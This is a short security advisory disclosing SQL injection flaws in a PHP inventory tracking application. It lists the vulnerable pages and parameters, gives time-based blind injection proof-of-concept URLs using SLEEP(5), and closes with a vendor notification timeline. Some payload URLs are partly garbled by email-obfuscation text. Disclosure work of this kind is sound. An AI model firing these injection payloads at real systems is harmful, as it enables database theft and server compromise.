0x01 Description
0x02 SQL Injection
0x03 Vendor Notification
PHP + SQL Inventory tracking system
The Inventoy application has muliple pages and parameters that are
vulnerable to SQL injection. These vulnerabilities could
be used to extract information from the database or take remote
control of the server.
-----Vulnerable Pages-----
http://localhost/inventory/consulta_fact.php?fact_num=[SQLi]
http://localhost/inventory/addinventario.php?ref=[SQLi]&sn=[SQLi]&factura=[SQLi]
http://localhost/inventory/newtransact.php?ref=[SQLi]
-----PoC Exploits-----
http://localhost/inventory/consulta_fact.php?fact_num=17 AND SLEEP(5)
http://localhost/inventory/[email protected]'
AND SLEEP(5) AND 'EJxe'='EJxe&sn=555-555-
[email protected]' AND SLEEP(5) AND
'IgkP'='IgkP&[email protected]' AND SLEEP(5) AND
'CFdY'='CFdY
http://localhost/inventory/newtransact.php?ref=RSC-280' AND SLEEP(5)
AND 'wIUB'='wIUB
10/19/12 - Vendor Notified
10/26/12 - No response, disclosure